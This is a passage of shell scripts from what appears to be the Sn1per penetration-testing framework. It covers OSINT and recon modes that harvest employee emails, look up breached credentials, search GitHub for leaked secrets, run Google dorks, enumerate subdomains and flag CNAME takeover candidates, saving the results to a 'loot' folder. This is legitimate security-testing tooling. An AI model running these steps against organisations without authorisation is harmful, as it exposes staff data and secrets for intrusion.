curl --insecure -L -s "https://urlscan.io/api/v1/search/?q=domain:$TARGET" 2> /dev/null | egrep "country|server|domain|ip|asn|$TARGET|prt"| sort -u | tee $LOOT_DIR/osint/urlscanio-$TARGET.txt 2> /dev/null
fi
if [[ "$HUNTERIO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS VIA HUNTER.IO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s "https://api.hunter.io/v2/domain-search?domain=$TARGET&api_key=$HUNTERIO_KEY" | egrep "name|value|domain|company|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/hunterio-$TARGET.txt 2> /dev/null
fi
if [[ "$TOMBAIO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS VIA TOMBA.IO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -H "X-Tomba-Key: $TOMBAIO_KEY" -H "X-Tomba-Secret: $TOMBAIO_SECRET" -s "https://api.tomba.io/v1/domain-search?domain=$TARGET" | egrep "email|organization|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/tombaio$TARGET.txt 2> /dev/null
fi
if [[ "$METASPLOIT_EXPLOIT" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS VIA METASPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -x "use auxiliary/gather/search_email_collector; set DOMAIN $TARGET; run; exit y" | tee $LOOT_DIR/osint/msf-emails-$TARGET.txt 2> /dev/null
fi
if [[ "$H8MAIL" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR COMPROMISED CREDENTIALS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
h8mail -q domain --target $TARGET -o $LOOT_DIR/osint/h8mail-$TARGET.csv 2> /dev/null
fi
if [[ "$GITHUB_SECRETS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR GITHUB SECRETS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $INSTALL_DIR/plugins/gitGraber/
ORGANIZATION=$(echo $TARGET | awk -F. '{print $(NF-1)}' 2> /dev/null)
mv $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.old 2> /dev/null
mv -f rawGitUrls.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt 2> /dev/null
touch rawGitUrls.txt 2> /dev/null
python3 gitGraber.py -q "\"org:$ORGANIZATION\"" -s 2>&1 | tee $LOOT_DIR/osint/gitGrabber-$ORGANIZATION.txt 2> /dev/null
diff $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.old 2> /dev/null > $LOOT_DIR/osint/github-urls-$ORGANIZATION.diff
cat $LOOT_DIR/osint/github-urls-$ORGANIZATION.diff 2> /dev/null
#python3 gitGraber.py -k wordlists/keywords.txt -q "\"$TARGET\"" -s 2>&1 | tee $LOOT_DIR/osint/gitGrabber-$TARGET.txt 2> /dev/null
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi

26
modes/osint_stage_2.sh Normal file
View File

@@ -0,0 +1,26 @@
if [[ $SCAN_TYPE == "DOMAIN" ]] && [[ $OSINT == "1" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ $GOOHAK = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
goohak $TARGET > /dev/null
fi
if [[ $INURLBR = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
php /usr/share/sniper/bin/inurlbr.php --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/osint/inurlbr-$TARGET
rm -Rf output/ cookie.txt exploits.conf
fi
GHDB="1"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi

263
modes/recon.sh Normal file
View File

@@ -0,0 +1,263 @@
if [[ "$RECON" = "1" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
touch $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
cp $LOOT_DIR/domains/domains-$TARGET-full.txt $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
if [[ "$SUBLIST3R" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null > /dev/null
sed -ie 's/<BR>/\n/g' domains-$TARGET-full.txt 2> /dev/null
mv -f $LOOT_DIR/domains/domains-$TARGET.txte $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
fi
if [[ "$AMASS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
amass enum -ip -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -rf /usr/share/sniper/plugins/massdns/lists/resolvers.txt -d $TARGET 2>/dev/null > /dev/null
cut -d" " -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
cut -d" " -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null > $LOOT_DIR/ips/amass-ips-$TARGET.txt
wc -l $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
wc -l $LOOT_DIR/ips/amass-ips-$TARGET.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING REVERSE WHOIS DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
amass intel -whois -d $TARGET > $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null
fi
if [[ "$SUBFINDER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "$OKBLUE[*]$RESET Running: subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -d $TARGET -t 100 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -d $TARGET -nW -rL /sniper/wordlists/resolvers.txt -t $THREADS 2>/dev/null > /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null
fi
if [[ "$DNSCAN" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt 2>/dev/null | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
sed -ie 's/<BR>/\n/g' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
mv -f $LOOT_DIR/domains/domains-$TARGET.txte $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
fi
echo ""
if [[ "$CRTSH" = "1" ]]; then
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$RESET"
curl -s https://crt.sh/?q=%25.$TARGET > $LOOT_DIR/domains/domains-$TARGET-presorted.txt
cat $LOOT_DIR/domains/domains-$TARGET-presorted.txt | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/BR/\n/g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt
wc -l $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
fi
if [[ "$SPYSE" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SPYSE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKBLUE"
spyse -target $TARGET --subdomains | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-spyse.txt
wc -l $LOOT_DIR/domains/domains-$TARGET-spyse.txt 2> /dev/null
fi
if [[ "$CENSYS_SUBDOMAINS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | egrep -v "Searching|Found" > $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
fi
if [[ "$SHODAN" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SHODAN SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
shodan init $SHODAN_API_KEY
shodan search "hostname:*.$TARGET" > $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null
awk '{print $3}' $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null | grep -v "\;" > $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2> /dev/null
awk '{print $1}' $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2> /dev/null
wc -l $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
fi
if [[ "$PROJECT_SONAR" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," | grep -v "<BR>" | sort -u | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
fi
if [[ "$GITHUB_SUBDOMAINS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING GITHUB SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/bin/github-subdomains.py -t $GITHUB_API_TOKEN -d $TARGET $LOOT_DIR/domains/domains-$TARGET-github.txt 2> /dev/null
fi
if [[ "$RAPIDDNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING RAPIDDNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null
fi
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-spyse.txt /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2>/dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-github.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null | grep -v "*" | grep -v "?" 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
if [[ "$SUBBRUTE_DNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SUBBRUTE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 "$INSTALL_DIR/plugins/massdns/scripts/subbrute.py" $INSTALL_DIR/wordlists/domains-all.txt $TARGET 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null
fi
if [[ "$ALT_DNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING ALTDNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" > /tmp/domain 2> /dev/null
altdns -i /tmp/domain -w $INSTALL_DIR/wordlists/altdns.txt -o $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
fi
if [[ "$DNSGEN" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNSGEN SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
dnsgen /tmp/domain > $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
fi
if [[ "$MASS_DNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MASSDNS ON SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sort -u $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt $LOOT_DIR/domains/domains-$TARGET-altdns.txt $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
massdns -r /usr/share/sniper/plugins/massdns/lists/resolvers.txt $LOOT_DIR/domains/domains-$TARGET-alldns.txt -o S -t A -w $LOOT_DIR/domains/domains-$TARGET-massdns.txt > /dev/null
awk -F ". " '{print $1}' $LOOT_DIR/domains/domains-$TARGET-massdns.txt 2> /dev/null | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
#grep "CNAME" $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
#wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
#grep "A " $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
#wc -l $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
#cat $LOOT_DIR/ips/massdns-A-records-$TARGET.txt >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
#wc -l $LOOT_DIR/ips/ips-all-unsorted.txt
fi
cat $LOOT_DIR/domains/domains-$TARGET-presorted.txt $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null | sort -u 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
sed -ie 's/<BR>/\n/g' $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
mv -f $LOOT_DIR/domains/domains-$TARGET-full.txte $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-full.txt >> $LOOT_DIR/scans/updated.txt 2> /dev/null
#rm -f $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
diff $LOOT_DIR/domains/domains_old-$TARGET.txt $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/domains/domains_new-$TARGET.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED NEW SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wc -l $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null
if [[ $(wc -c $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_DOMAINS_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/domains/domains_new-$TARGET.txt"
fi
fi
echo -e "$RESET"
if [[ "$STATIC_GREP_SEARCH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING INTERESTING DOMAINS SEARCH $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
egrep -iE "GREP_INTERESTING_SUBDOMAINS" $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | tee $LOOT_DIR/domains/domains_interesting-$TARGET.txt | head -n "$GREP_MAX_LINES"
fi
if [[ "$SUBHIJACK_CHECK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR CNAME SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null > $LOOT_DIR/nmap/takeovers_old-all.txt
dig $TARGET CNAME | egrep -i "netlify|anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "netlify|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME | sort -u > $LOOT_DIR/nmap/takeovers_new-all.txt
diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' | sort -u > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_TAKEOVERS_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/takeovers_new-diff.txt"
fi
fi
if [[ "$SUBOVER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING SUBOVER HIJACKING SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
